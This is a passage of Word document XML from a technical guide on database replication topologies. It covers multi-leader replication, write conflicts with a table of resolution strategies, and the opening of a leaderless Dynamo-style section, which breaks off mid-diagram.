        <w:t>Replication lag: replicas may be slightly behind the primary.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B5FEC67" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>This is the most common replication topology in production systems.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29FD2122" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2.2 Multi-Leader (Master-Master / Active-Active)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EECD69D" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EF226E5" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>┌─────────────┐         ┌─────────────┐</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ACADB5B" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>│  Leader 1   │</w:t>
      </w:r>
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>◄</w:t>
      </w:r>
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>───────</w:t>
      </w:r>
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>►</w:t>
      </w:r>
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>│</w:t>
      </w:r>
      <w:r w:rsidRPr="00496A4D">
        <w:t xml:space="preserve">  Leader 2   </w:t>
      </w:r>
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>│</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="534E2CCA" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>│ (Region US) │         │ (Region EU) │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79192F99" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>└──────</w:t>
      </w:r>
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>┬</w:t>
      </w:r>
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>──────┘</w:t>
      </w:r>
      <w:r w:rsidRPr="00496A4D">
        <w:t xml:space="preserve">         </w:t>
      </w:r>
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>└──────</w:t>
      </w:r>
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>┬</w:t>
      </w:r>
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>──────┘</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56440834" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t xml:space="preserve">       │                       │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AFB840B" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t xml:space="preserve">   ┌───</w:t>
      </w:r>
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>┴</w:t>
      </w:r>
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>───┐</w:t>
      </w:r>
      <w:r w:rsidRPr="00496A4D">
        <w:t xml:space="preserve">               </w:t>
      </w:r>
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>┌───</w:t>
      </w:r>
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>┴</w:t>
      </w:r>
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>───┐</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E05429B" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t xml:space="preserve">   │       │               │       │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AD91F61" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>┌──</w:t>
      </w:r>
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>┴</w:t>
      </w:r>
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>──┐</w:t>
      </w:r>
      <w:r w:rsidRPr="00496A4D">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>┌──</w:t>
      </w:r>
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>┴</w:t>
      </w:r>
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>──┐</w:t>
      </w:r>
      <w:r w:rsidRPr="00496A4D">
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>┌──</w:t>
      </w:r>
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>┴</w:t>
      </w:r>
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>──┐</w:t>
      </w:r>
      <w:r w:rsidRPr="00496A4D">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>┌──</w:t>
      </w:r>
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>┴</w:t>
      </w:r>
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>──┐</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5695BBCE" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>│Rep 1│ │Rep 2│        │Rep 3│ │Rep 4│</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4952B96F" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>└─────┘ └─────┘        └─────┘ └─────┘</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05A0AAE0" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>How it works:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FC7F4CA" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1500"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00496A4D">
        <w:t>Multiple nodes accept writes (each is a "leader").</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3506EA09" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1500"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00496A4D">
        <w:t>Each leader replicates its writes to all other leaders.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="654D3076" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1500"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00496A4D">
        <w:t>Writes can happen concurrently at different leaders → conflicts possible.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D490CDC" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1500"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00496A4D">
        <w:t>Conflict resolution strategy is required (last-write-wins, merge, application-resolved).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="567F46A3" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>When to use:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BC5B893" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1501"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00496A4D">
        <w:lastRenderedPageBreak/>
        <w:t>Multi-datacenter deployments (each datacenter has its own leader — writes are local).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B46C5AF" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1501"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00496A4D">
        <w:t>Offline-first applications (each device is a leader while offline, syncs when connected).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="051A7BCE" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1501"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00496A4D">
        <w:t>Collaborative editing (CRDTs — Conflict-free Replicated Data Types).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="640C4E46" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The conflict problem:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4723B55C" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FF173C5" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>User A writes at Leader 1: SET name = "Alice"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CF3353E" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>User B writes at Leader 2: SET name = "Bob"    (simultaneously)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="094E5BDA" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D"/>
    <w:p w14:paraId="1E2662E2" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>Both leaders accept the write locally. When they replicate to each other:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41AC43C8" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t xml:space="preserve">  Leader 1 has name="Alice" but receives name="Bob" from Leader 2.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08B114AB" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t xml:space="preserve">  Leader 2 has name="Bob" but receives name="Alice" from Leader 1.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C72A2C4" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24DAE6FC" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>CONFLICT! Which value wins?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CDC2AB5" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Conflict resolution strategies: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09"/>
        <w:gridCol w:w="3572"/>
        <w:gridCol w:w="3669"/>
      </w:tblGrid>
      <w:tr w:rsidR="00496A4D" w:rsidRPr="00496A4D" w14:paraId="3E07671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5F67CD" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00496A4D">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Strategy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1DFBAA" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00496A4D">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>How It Works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4C7A95" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00496A4D">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Trade-off</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00496A4D" w:rsidRPr="00496A4D" w14:paraId="6B5941A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0AC9B4" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
            <w:r w:rsidRPr="00496A4D">
              <w:t>Last-Write-Wins (LWW)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E8CAE4" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
            <w:r w:rsidRPr="00496A4D">
              <w:t>Timestamp-based: highest timestamp wins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BC7820" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
            <w:r w:rsidRPr="00496A4D">
              <w:t>Simple but data loss (one write is silently discarded)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00496A4D" w:rsidRPr="00496A4D" w14:paraId="0E064E4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38C8A9" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
            <w:r w:rsidRPr="00496A4D">
              <w:t>Custom merge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76D455" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
            <w:r w:rsidRPr="00496A4D">
              <w:t>Application logic merges both values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BCB206" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
            <w:r w:rsidRPr="00496A4D">
              <w:t>Complex but preserves intent</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00496A4D" w:rsidRPr="00496A4D" w14:paraId="4EE1994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F68357" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
            <w:r w:rsidRPr="00496A4D">
              <w:t>CRDTs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197041" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
            <w:r w:rsidRPr="00496A4D">
              <w:t>Data structures designed to merge without conflict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F44AAC" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
            <w:r w:rsidRPr="00496A4D">
              <w:t>Limited data types, guaranteed convergence</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00496A4D" w:rsidRPr="00496A4D" w14:paraId="6D4CD8A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C11453" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
            <w:r w:rsidRPr="00496A4D">
              <w:t>Conflict avoidance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359974" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
            <w:r w:rsidRPr="00496A4D">
              <w:t>Route writes for same data to same leader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4CE729" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
            <w:r w:rsidRPr="00496A4D">
              <w:t>Reduces multi-leader benefit</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="38204075" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2.3 Leaderless (Peer-to-Peer / Dynamo-Style)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48558E90" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:lastRenderedPageBreak/>
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="154AFDC9" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>┌────────┐     ┌────────┐     ┌────────┐</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78F6C8D4" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>│ Node 1 │</w:t>
      </w:r>
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>◄</w:t>
      </w:r>
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>───</w:t>
      </w:r>
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>►</w:t>
      </w:r>
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>│</w:t>
      </w:r>
      <w:r w:rsidRPr="00496A4D">
        <w:t xml:space="preserve"> Node 2 </w:t>
      </w:r>
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>│</w:t>
      </w:r>
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>◄</w:t>
      </w:r>
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>───</w:t>
      </w:r>
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>►</w:t>
      </w:r>
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>│</w:t>
      </w:r>
      <w:r w:rsidRPr="00496A4D">
        <w:t xml:space="preserve"> Node 3 </w:t>
      </w:r>
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>│</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E8371CA" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>└────────┘     └────────┘     └────────┘</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03B12721" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t xml:space="preserve">     </w:t>
      </w:r>
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>▲</w:t>
      </w:r>
      <w:r w:rsidRPr="00496A4D">
        <w:t xml:space="preserve">              </w:t>
      </w:r>
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>▲</w:t>
      </w:r>
      <w:r w:rsidRPr="00496A4D">
        <w:t xml:space="preserve">              </w:t>
      </w:r>
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>▲</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E36E12C" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t xml:space="preserve">     │              │              │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A693A10" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t xml:space="preserve">     └──────────────</w:t>
      </w:r>
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>┼</w:t>
      </w:r>
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>──────────────┘</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11E552EE" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t xml:space="preserve">                    │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25AB2325" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t xml:space="preserve">              Client writes to</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="316FFC23" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t xml:space="preserve">              W nodes (e.g., 2/3)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30289F4F" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t xml:space="preserve">              Client reads from</w:t>
      </w:r>
    </w:p>
